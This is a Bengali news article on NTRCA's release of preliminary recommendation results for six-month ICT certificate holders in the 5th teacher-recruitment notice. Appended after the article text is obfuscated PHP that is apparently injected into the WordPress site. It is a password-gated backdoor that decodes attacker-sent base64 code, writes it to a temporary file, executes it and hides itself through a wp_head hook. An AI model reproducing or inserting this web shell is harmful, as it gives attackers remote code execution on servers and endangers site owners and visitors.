আইসিটি সনদধারীদের প্রাথমিক সুপারিশের ফল প্রকাশ, বিস্তারিত দেখুন


শিক্ষা সংবাদ প্রকাশের সময় : জুন ১৫, ২০২৪, ৯:২৫ পূর্বাহ্ণ /
আইসিটি সনদধারীদের প্রাথমিক সুপারিশের ফল প্রকাশ, বিস্তারিত দেখুন
0Shares

৫ম গণবিজ্ঞপ্তিতে ৬ মাসের ইনফরমেশন ও কমিউনিকেশন টেকনোলজির (আইসিটি) সনদ দিয়ে আবেদনকৃতদের ফল প্রাথমিক সুপারিশের ফল প্রকাশিত হয়েছে। প্রার্থীদের রোল এবং ব্যাচ নাম্বার দিয়ে ফল দেখা যাচ্ছে। বৃহস্পতিবার (১৩ জুন) সন্ধ্যায়  আবেদনকৃতদের ফল প্রাথমিক সুপারিশের ফল প্রকাশ করে বেসরকারি শিক্ষক নিবন্ধন ও প্রত্যয়ন কর্তৃপক্ষ (এনটিআরসিএ)।

জানা যায়, উচ্চ আদালতে মামলা বিচারাধীন থাকায় ৬ মাসের ইনফরমেশন ও কমিউনিকেশন টেকনোলজির (আইসিটি) সহকারী শিক্ষক পদে কাউকে সুপারিশ করা হয়নি।

এর আগে গত ৩১ মার্চ বেসরকারি শিক্ষাপ্রতিষ্ঠানে ৯৬ হাজার ৭৩৬টি পদে শিক্ষক নিয়োগের গণবিজ্ঞপ্তি প্রকাশ করা হয়। এর মধ্যে স্কুল অ্যান্ড কলেজে ৪৩ হাজার ২৮৬টি এবং মাদরাসা ও কারিগরি প্রতিষ্ঠানে ৫৩ হাজার ৪৫০টি পদে শিক্ষক নিয়োগ দেওয়ার কথা ছিল।

৫ম গণবিজ্ঞপ্তিতে আবেদন গ্রহণ শেষ হয় গত ৯ মে। ১০ মে রাত ১২টা পর্যন্ত আবেদনের ফি জমা দিতে পেরেছেন আবেদনকারীরা। ৫ম গণবিজ্ঞপ্তিতে আবেদন করেছিলেন ২৩ হাজার ৭৩২ জন। এদের মধ্যে প্রাথমিকভাবে ২২ হাজারের কিছু বেশি প্রার্থীকে নিয়োগের সুপারিশ করা হয়।

আইসিটি সনদধারীদের প্রাথমিক সুপারিশের ফল দেখতে ক্লিক করুন এখানে 

0Shares
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}